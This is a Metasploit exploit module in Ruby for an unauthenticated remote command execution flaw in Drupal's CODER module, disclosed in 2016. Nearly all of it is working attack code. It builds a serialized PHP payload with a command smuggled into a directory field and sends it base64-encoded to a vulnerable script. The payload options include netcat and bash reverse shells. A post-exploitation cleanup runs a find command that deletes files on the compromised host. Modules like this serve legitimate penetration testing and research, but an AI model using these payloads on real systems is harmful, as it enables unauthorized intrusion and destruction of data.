110 lines
3.6 KiB
Ruby
110 lines
3.6 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => 'Drupal CODER Module Remote Command Execution',
|
|
'Description' => %q{
|
|
This module exploits a Remote Command Execution vulnerability in the
|
|
Drupal CODER Module. Unauthenticated users can execute arbitrary
|
|
commands under the context of the web server user.
|
|
|
|
The CODER module doesn't sufficiently validate user inputs in a script
|
|
file that has the PHP extension. A malicious unauthenticated user can
|
|
make requests directly to this file to execute arbitrary commands.
|
|
The module does not need to be enabled for this to be exploited.
|
|
|
|
This module was tested against CODER 2.5 with Drupal 7.5 installed on
|
|
Ubuntu Server.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Nicky Bloor <nick@nickbloor.co.uk>', # discovery
|
|
'Mehmet Ince <mehmet@mehmetince.net>' # msf module
|
|
],
|
|
'References' =>
|
|
[
|
|
['URL', 'https://www.drupal.org/node/2765575']
|
|
],
|
|
'Privileged' => false,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 250,
|
|
'DisableNops' => true,
|
|
'BadChars' => "\x2f",
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd cmd_bash',
|
|
'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
|
|
},
|
|
},
|
|
'Platform' => ['unix'],
|
|
'Arch' => ARCH_CMD,
|
|
'Targets' => [ ['Automatic', {}] ],
|
|
'DisclosureDate' => 'Jul 13 2016',
|
|
'DefaultTarget' => 0
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
|
|
]
|
|
)
|
|
end
|
|
|
|
def check
|
|
res = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
|
|
)
|
|
|
|
if res && res.body.include?('file parameter is not setNo path to parameter file')
|
|
Exploit::CheckCode::Appears
|
|
else
|
|
Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
|
|
def exploit
|
|
p = ''
|
|
p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
|
|
p << 's:11:"theme_cache";s:16:"theme_cache_test";'
|
|
p << 's:9:"variables";s:14:"variables_test";'
|
|
p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
|
|
p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
|
|
p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
|
|
p << 's:7:"new_dir";s:'
|
|
p << (payload.encoded.length + 5).to_s
|
|
p << ':"-v;'
|
|
p << payload.encoded
|
|
p << ' #";s:4:"name";s:4:"test";}}}'
|
|
|
|
pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
|
|
|
|
send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
|
|
'encode_params' => false,
|
|
'vars_get' => {
|
|
'file' => pl
|
|
}
|
|
)
|
|
end
|
|
|
|
# XXX: FileDropper can't handle weird filenames
|
|
def on_new_session(session)
|
|
# This find command should be decently portable...
|
|
command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
|
|
print_status("Cleaning up: #{command}")
|
|
session.shell_command_token(command)
|
|
end
|
|
end
|